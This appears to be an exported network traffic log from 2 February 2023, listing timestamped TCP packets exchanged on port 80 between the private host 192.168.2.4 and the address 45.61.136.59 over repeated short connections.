                                                                                                                                            Feb 2, 2023 21:17:37.757579088 CET804975845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:37.758805990 CET4975880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:37.802934885 CET804975945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:37.803076029 CET4975980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:37.803857088 CET4975980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:37.968545914 CET804975945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:37.968604088 CET804975945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.016122103 CET4975980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.107673883 CET4975980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.143748999 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.272572994 CET804975945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.274671078 CET4975980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.308764935 CET804976045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.310659885 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.337613106 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:38.502840042 CET804976045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.502934933 CET804976045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.547430992 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.015589952 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.055052042 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.180748940 CET804976045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.182750940 CET4976080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.222898960 CET804976145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.223072052 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.258378983 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.426306963 CET804976145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.426423073 CET804976145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.469315052 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.700221062 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.742887020 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.868383884 CET804976145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.868484974 CET4976180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.907788992 CET804976245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.908042908 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:39.910600901 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.075249910 CET804976245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.075313091 CET804976245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.125624895 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.192933083 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.229866982 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.357780933 CET804976245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.357908964 CET4976280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.397492886 CET804976345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.397840977 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.398124933 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.565551043 CET804976345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.565676928 CET804976345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.610060930 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.824014902 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.857013941 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:40.992067099 CET804976345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.992204905 CET4976380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.024956942 CET804976445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.025199890 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.025835991 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.193329096 CET804976445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.193419933 CET804976445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.238836050 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.299968004 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.347937107 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.467727900 CET804976445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.469640970 CET4976480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.512552977 CET804976545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.514892101 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.515268087 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.679882050 CET804976545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.679944992 CET804976545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.719528913 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.785428047 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.815763950 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.950287104 CET804976545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.950465918 CET4976580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.980597019 CET804976645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.980854034 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:41.981431007 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.146055937 CET804976645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.146136999 CET804976645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.188424110 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.269851923 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.300343037 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.434808016 CET804976645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.434994936 CET4976680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.465024948 CET804976745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.465193987 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.465960979 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.630436897 CET804976745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.630477905 CET804976745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.672815084 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.742072105 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.775867939 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.906769037 CET804976745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.906879902 CET4976780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.943089008 CET804976845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.943237066 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:42.943598986 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.110729933 CET804976845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.110816956 CET804976845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.157135963 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.250310898 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.278101921 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.417686939 CET804976845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.417812109 CET4976880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.443057060 CET804976945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.443483114 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.443830967 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.608412981 CET804976945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.608535051 CET804976945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.657196999 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.724328995 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.761472940 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.889163017 CET804976945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.893171072 CET4976980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.926383018 CET804977045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.926579952 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:43.926925898 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.091720104 CET804977045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.091758013 CET804977045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.141611099 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.379757881 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.411935091 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.544552088 CET804977045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.547404051 CET4977080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.579236984 CET804977145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.581700087 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.582052946 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.749068022 CET804977145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.749151945 CET804977145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.798012972 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.864552975 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:44.912728071 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.031908989 CET804977145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.032563925 CET4977180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.077483892 CET804977245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.079250097 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.080285072 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.244904041 CET804977245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.245088100 CET804977245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.294380903 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.365438938 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.395759106 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.530261993 CET804977245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.530424118 CET4977280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.560628891 CET804977345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.560765028 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.561255932 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.726016045 CET804977345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.726116896 CET804977345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.766760111 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:45.857362032 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.022758961 CET804977345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.065329075 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.129188061 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.169130087 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.294382095 CET804977345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.294903994 CET4977380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.334155083 CET804977445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.334358931 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.334724903 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.499588013 CET804977445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.499655008 CET804977445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.548053026 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.614794016 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.647495031 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.780083895 CET804977445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.780215979 CET4977480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.812418938 CET804977545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.812606096 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.812813997 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:46.977509022 CET804977545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.977704048 CET804977545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.032557964 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.170207977 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.206125021 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.335442066 CET804977545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.339462996 CET4977580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.374212980 CET804977645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.375497103 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.375814915 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.543689013 CET804977645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.544250011 CET804977645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.595145941 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.660394907 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.689059019 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.828345060 CET804977645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.829684973 CET4977680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.853903055 CET804977745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.854047060 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:47.854316950 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.019071102 CET804977745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.019141912 CET804977745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.063836098 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.185997009 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.215738058 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.350994110 CET804977745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.351109028 CET4977780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.380743980 CET804977845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.380883932 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.386626959 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.551570892 CET804977845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.551610947 CET804977845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.595201015 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.661457062 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.693073034 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.826800108 CET804977845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.827007055 CET4977880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.858817101 CET804977945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.859004974 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:48.859298944 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.024066925 CET804977945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.024195910 CET804977945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.079544067 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.350531101 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.388982058 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.515964031 CET804977945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.516066074 CET4977980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.554229021 CET804978045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.554389000 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.569186926 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.734014988 CET804978045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.734395981 CET804978045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.782753944 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.848330021 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:49.880836010 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.013200045 CET804978045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.013345003 CET4978080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.045797110 CET804978145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.045933962 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.046238899 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.210952044 CET804978145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.211023092 CET804978145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.267158031 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.415966034 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.445307016 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.580837011 CET804978145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.580993891 CET4978180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.610402107 CET804978245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.610512972 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.610810041 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:50.775352955 CET804978245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.775465012 CET804978245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.829690933 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.220602036 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.249735117 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.385942936 CET804978245.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.386130095 CET4978280192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.417634964 CET804978345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.417728901 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.418057919 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.585830927 CET804978345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.585896015 CET804978345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.626826048 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.694155931 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.725677013 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.862093925 CET804978345.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.862364054 CET4978380192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.890224934 CET804978445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.890445948 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:51.893188953 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:52.057857037 CET804978445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:52.057910919 CET804978445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:52.111145973 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:52.799745083 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:52.964590073 CET804978445.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:52.964839935 CET4978480192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.171992064 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.336872101 CET804978545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.337138891 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.337488890 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.502121925 CET804978545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.502639055 CET804978545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.559146881 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.623209000 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.651801109 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.788151979 CET804978545.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.790544033 CET4978580192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.819819927 CET804978645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.820441008 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.822416067 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:53.990297079 CET804978645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.990360022 CET804978645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.040083885 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.103200912 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.136147022 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.271274090 CET804978645.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.275434017 CET4978680192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.303543091 CET804978745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.303747892 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.303980112 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.471232891 CET804978745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.471301079 CET804978745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.519784927 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.602298975 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.628515959 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.770024061 CET804978745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.770188093 CET4978780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.796490908 CET804978845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.799900055 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.804991007 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:54.972965956 CET804978845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.973000050 CET804978845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.029043913 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.161359072 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.188781977 CET4978980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.329570055 CET804978845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.338972092 CET4978880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.353806973 CET804978945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.354254007 CET4978980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.364800930 CET4978980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:55.529978991 CET804978945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.530050039 CET804978945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.600138903 CET4978980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:17:57.042872906 CET4978980192.168.2.445.61.136.59
